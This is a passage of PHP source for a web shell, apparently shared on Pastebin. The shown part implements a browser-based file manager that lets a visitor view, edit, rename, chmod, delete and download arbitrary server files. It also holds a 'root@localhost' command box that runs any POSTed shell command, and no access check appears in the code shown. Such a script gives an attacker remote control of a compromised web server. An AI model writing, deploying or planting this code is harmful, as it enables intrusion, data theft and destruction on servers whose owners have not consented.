  1432. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  1433. } elseif($_GET['act'] == 'edit') {
  1434. if($_POST['save']) {
  1435. $save = file_put_contents($_GET['file'], $_POST['src']);
  1436. if($save) {
  1437. $act = "<font color=lime>Saved!</font>";
  1438. } else {
  1439. $act = "<font color=red>permission denied</font>";
  1440. }
  1441. echo "".$act."<br>";
  1442. }
  1443. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1444. echo "<form method='post'>
  1445. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  1446. <input type='submit' value='Save' name='save' style='width: 500px;'>
  1447. </form>";
  1448. } elseif($_GET['act'] == 'rename') {
  1449. if($_POST['do_rename']) {
  1450. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  1451. if($rename) {
  1452. $act = "<script>window.location='?dir=".$dir."';</script>";
  1453. } else {
  1454. $act = "<font color=red>permission denied</font>";
  1455. }
  1456. echo "".$act."<br>";
  1457. }
  1458. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1459. echo "<form method='post'>
  1460. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  1461. <input type='submit' name='do_rename' value='rename'>
  1462. </form>";
  1463. } elseif($_GET['act'] == 'chmod') {
  1464. $mode = $_POST['mode'];
  1465. if($_POST['do_chmod']) {
  1466. $chmod = @chmod($_GET['file'], $mode);
  1467. if($chmod) {
  1468. $act = "<script>window.location='?dir=".$dir."';</script>";
  1469. } else {
  1470. $act = "<font color=red>permission denied</font>";
  1471. }
  1472. echo "".$act."<br>";
  1473. }
  1474. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'><b>chmod</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1475. echo "<form method='post'>
  1476. <input type='text' value='0644' name='mode' style='width: 450px;' height='10'>
  1477. <input type='submit' name='do_chmod' value='chmod'>
  1478. </form>";
  1479. } elseif($_GET['act'] == 'delete') {
  1480. $delete = unlink($_GET['file']);
  1481. if($delete) {
  1482. $act = "<script>window.location='?dir=".$dir."';</script>";
  1483. } else {
  1484. $act = "<font color=red>permission denied</font>";
  1485. }
  1486. echo $act;
  1487. } else {
  1488. if(is_dir($dir) === true) {
  1489. if(!is_readable($dir)) {
  1490. echo "<font color=red>can't open directory. ( not readable )</font>";
  1491. } else {
  1492. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  1493.  
  1494. <tr>
  1495. <th class="th_home"><center>Name</center></th>
  1496. <th class="th_home"><center>Type</center></th>
  1497. <th class="th_home"><center>Size</center></th>
  1498. <th class="th_home"><center>Last Modified</center></th>
  1499. <th class="th_home"><center>Owner/Group</center></th>
  1500. <th class="th_home"><center>Permission</center></th>
  1501. <th class="th_home"><center>Action</center></th>
  1502. </tr>';
  1503. $scandir = scandir($dir);
  1504. foreach($scandir as $dirx) {
  1505. $dtype = filetype("$dir/$dirx");
  1506. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  1507. if(function_exists('posix_getpwuid')) {
  1508. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  1509. $downer = $downer['name'];
  1510. } else {
  1511. //$downer = $uid;
  1512. $downer = fileowner("$dir/$dirx");
  1513. }
  1514. if(function_exists('posix_getgrgid')) {
  1515. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  1516. $dgrp = $dgrp['name'];
  1517. } else {
  1518. $dgrp = filegroup("$dir/$dirx");
  1519. }
  1520. if(!is_dir("$dir/$dirx")) continue;
  1521. if($dirx === '..') {
  1522. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  1523. } elseif($dirx === '.') {
  1524. $href = "<a href='?dir=$dir'>$dirx</a>";
  1525. } else {
  1526. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  1527. }
  1528. if($dirx === '.' || $dirx === '..') {
  1529. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  1530. } else {
  1531. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  1532. }
  1533. echo "<tr>";
  1534. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  1535. echo "<td class='td_home'><center>$dtype</center></td>";
  1536. echo "<td class='td_home'><center>-</center></th></td>";
  1537. echo "<td class='td_home'><center>$dtime</center></td>";
  1538. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  1539. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  1540. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  1541. echo "</tr>";
  1542. }
  1543. }
  1544. } else {
  1545. echo "<font color=red>can't open directory.</font>";
  1546. }
  1547. foreach($scandir as $file) {
  1548. $ftype = filetype("$dir/$file");
  1549. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  1550. $size = filesize("$dir/$file")/1024;
  1551. $size = round($size,3);
  1552. if(function_exists('posix_getpwuid')) {
  1553. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  1554. $fowner = $fowner['name'];
  1555. } else {
  1556. //$downer = $uid;
  1557. $fowner = fileowner("$dir/$file");
  1558. }
  1559. if(function_exists('posix_getgrgid')) {
  1560. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  1561. $fgrp = $fgrp['name'];
  1562. } else {
  1563. $fgrp = filegroup("$dir/$file");
  1564. }
  1565. if($size > 1024) {
  1566. $size = round($size/1024,2). 'MB';
  1567. } else {
  1568. $size = $size. 'KB';
  1569. }
  1570. if(!is_file("$dir/$file")) continue;
  1571. echo "<tr>";
  1572. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  1573. echo "<td class='td_home'><center>$ftype</center></td>";
  1574. echo "<td class='td_home'><center>$size</center></td>";
  1575. echo "<td class='td_home'><center>$ftime</center></td>";
  1576. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  1577. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  1578. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=chmod&dir=$dir&file=$dir/$file'>chmod</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  1579. echo "</tr>";
  1580. }
  1581. echo "</table>";
  1582. if(!is_readable($dir)) {
  1583. //
  1584. } else {
  1585. echo "<br>";
  1586. }
  1587. echo "<table width='100%' border='2' align='center'>";
  1588. echo "<td>";
  1589. echo "<br><form method='post'>
  1590. <font>&nbsp;&nbsp;root@localhost: ~ $ </font>
  1591. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  1592. </form>";
  1593. if($_POST['do_cmd']) {
  1594. echo "<pre>".exe($_POST['cmd'])."</pre>";
  1595. echo "<center>";
  1596. }
  1597. echo"</td>";
  1598. echo"</table>";
  1599. }
  1600. ?>
  1601. </html>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!